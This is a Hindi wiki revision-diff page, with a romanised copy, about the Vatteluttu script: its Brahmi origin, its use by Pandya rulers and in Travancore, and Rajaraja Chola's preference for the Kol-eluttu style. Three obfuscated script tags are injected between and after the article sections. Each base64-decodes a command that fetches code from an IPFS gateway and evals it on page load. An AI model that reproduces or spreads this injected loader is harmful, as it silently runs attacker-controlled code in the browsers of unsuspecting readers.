Difference between revisions of "वट्टेळुत्तु लिपि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*वट्टेळुत्तु लिपि का विकास, तमिल लिपि की तरह, ब्राह...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
*वट्टेळुत्तु लिपि का विकास, [[तमिल लिपि]] की तरह, ब्राह्मी से ही हुआ है।  
+
*वट्टेळुत्तु लिपि का विकास, [[तमिल लिपि]] की तरह, [[ब्राह्मी लिपि|ब्राह्मी]] से ही हुआ है।  
 
*तमिल लिपि को त्वरा से घसीट के साथ लिखने के कारण 7वीं शताब्दी के आस-पास दक्षिण के प्रदेशों में यह लिपि अस्तित्व में आई थी।  
 
*तमिल लिपि को त्वरा से घसीट के साथ लिखने के कारण 7वीं शताब्दी के आस-पास दक्षिण के प्रदेशों में यह लिपि अस्तित्व में आई थी।  
*पाण्ड्य शासकों ने अपने अभिलेखों में इसका उपयोग किया है।  
+
*[[पाण्ड्य साम्राज्य|पाण्ड्य]] शासकों ने अपने अभिलेखों में इसका उपयोग किया है।  
 
*[[तंजावूर]] के दक्षिण में और मलाबार तथा तिरुवितांकुर (ट्रावंकोर) में इस लिपि का बहुत व्यवहार हुआ है।  
 
*[[तंजावूर]] के दक्षिण में और मलाबार तथा तिरुवितांकुर (ट्रावंकोर) में इस लिपि का बहुत व्यवहार हुआ है।  
 
*तिरुवितांकुर (ट्रावंकोर) में तो अभी उन्नीसवीं शताब्दी तक इस लिपि का व्यवहार देखने को मिलता था।  
 
*तिरुवितांकुर (ट्रावंकोर) में तो अभी उन्नीसवीं शताब्दी तक इस लिपि का व्यवहार देखने को मिलता था।  
 
*दक्षिण [[भारत]] की लिपियों के विशेषज्ञ बार्नेल का मत था कि आरम्भ में [[तमिल भाषा]] के ग्रन्थ इसी लिपि में लिखे जाते थे।  
 
*दक्षिण [[भारत]] की लिपियों के विशेषज्ञ बार्नेल का मत था कि आरम्भ में [[तमिल भाषा]] के ग्रन्थ इसी लिपि में लिखे जाते थे।  
 
*इस लिपि के गोलाकार अक्षरों को देखने से पता चलता है कि [[ताड़पत्र (लेखन सामग्री)|ताड़पत्रों]] पर लोहे की कील से लिखने के लिए ही यह लिपि उपयुक्त थी।  
 
*इस लिपि के गोलाकार अक्षरों को देखने से पता चलता है कि [[ताड़पत्र (लेखन सामग्री)|ताड़पत्रों]] पर लोहे की कील से लिखने के लिए ही यह लिपि उपयुक्त थी।  
*पत्थरों पर गोलाकार अक्षरों को खोदने में काफ़ी कठिनाई होती है। इसीलिए राजराज चोल ने इस वट्टेळुत्तु लिपि के स्थान पर उसकी सीधे अक्षरों वाली ‘कोल-एळुत्तु’ शैली को पसन्द किया था।  
+
*पत्थरों पर गोलाकार अक्षरों को खोदने में काफ़ी कठिनाई होती है। इसीलिए [[राजराज प्रथम|राजराज]] [[चोल वंश|चोल]] ने इस वट्टेळुत्तु लिपि के स्थान पर उसकी सीधे अक्षरों वाली ‘कोल-एळुत्तु’ शैली को पसन्द किया था।  
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 09:40, 6 February 2011

  • vatteळuttu lipi ka vikas, tamil lipi ki tarah, brahmi se hi hua hai.
  • tamil lipi ko tvara se ghasit ke sath likhane ke karan 7vian shatabdi ke as-pas dakshin ke pradeshoan mean yah lipi astitv mean aee thi.
  • pandy shasakoan ne apane abhilekhoan mean isaka upayog kiya hai.
  • tanjavoor ke dakshin mean aur malabar tatha tiruvitaankur (travankor) mean is lipi ka bahut vyavahar hua hai.
  • tiruvitaankur (travankor) mean to abhi unnisavian shatabdi tak is lipi ka vyavahar dekhane ko milata tha.
  • dakshin bharat ki lipiyoan ke visheshajn barnel ka mat tha ki arambh mean tamil bhasha ke granth isi lipi mean likhe jate the.
  • is lipi ke golakar aksharoan ko dekhane se pata chalata hai ki ta dapatroan par lohe ki kil se likhane ke lie hi yah lipi upayukt thi.
  • pattharoan par golakar aksharoan ko khodane mean kafi kathinaee hoti hai. isilie rajaraj chol ne is vatteळuttu lipi ke sthan par usaki sidhe aksharoan vali ‘kol-eळuttu’ shaili ko pasand kiya tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>